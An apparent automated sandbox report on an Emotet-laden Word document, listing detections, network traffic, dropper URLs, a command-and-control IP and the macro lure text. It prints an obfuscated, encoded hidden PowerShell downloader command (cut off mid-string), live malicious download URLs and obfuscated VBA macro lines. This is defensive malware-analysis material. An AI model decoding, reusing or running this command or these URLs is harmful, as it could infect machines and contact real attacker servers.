14.2.rundll32.exe.1b0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.300000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.300000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 19 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArA

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://veterinariadrpopui.com/content/5f18Q/	Avira URL Cloud: Label: malware
Source: http://khanhhoahomnay.net/wordpress/CGMC/	Avira URL Cloud: Label: malware
Source: http://shop.elemenslide.com/wp-content/n/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: Documenten_9274874 8574977265.doc	Virustotal: Detection: 37%			Perma Link
Source: Documenten_9274874 8574977265.doc	ReversingLabs: Detection: 44%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,	7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,	7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,	7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D75AE CryptDecodeObjectEx,	14_2_001D75AE

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_001D109C FindFirstFileW,

14_2_001D109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: global traffic

DNS query: name: wpsapk.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 104.18.61.59:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 104.18.61.59:80

Networking:

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in memory: http://veterinariadrpopui.com/content/5f18Q/
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 209.59.139.39 209.59.139.39

Source: Joe Sandbox View	ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic

HTTP traffic detected: POST /gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/ HTTP/1.1DNT: 0Referer: 5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/Content-Type: multipart/form-data; boundary=-------------------HmagTJdPQZ43LVgAX2LUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 5684Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_001E023A InternetReadFile,

14_2_001E023A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24B14A20-30CA-4646-ACFF-79FC9E14ADCB}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: wpsapk.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2114223175.00000000038E8000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: rundll32.exe, 00000006.00000002.2119198742.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2112858407.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113351173.0000000001F77000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2119198742.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2112858407.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113351173.0000000001F77000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2109131645.00000000023C0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114086718.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2114620463.00000000026D0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2119198742.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2112858407.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113351173.0000000001F77000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2114223175.00000000038E8000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2113994382.0000000003863000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2114107313.00000000038AD000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
Source: rundll32.exe, 00000006.00000002.2119198742.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2112858407.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113351173.0000000001F77000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2113972986.0000000003846000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2109131645.00000000023C0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114086718.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2114620463.00000000026D0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2119198742.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2112858407.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113351173.0000000001F77000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2108564862.00000000002B4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2108564862.00000000002B4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2113058127.0000000001D90000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2113094519.0000000003512000.00000004.00000001.sdmp	String found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
Source: powershell.exe, 00000005.00000002.2114107313.00000000038AD000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2113985934.000000000384E000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000B.00000002.2118205619.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2119457993.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2110989344.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2122389550.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2112555431.0000000000321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2113546324.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2118310985.0000000000381000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2112508539.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2115211069.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2349226976.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.rundll32.exe.380000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.7e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K O a S
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K O a S
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")	Name: G8xesq0b8jlsfrsp
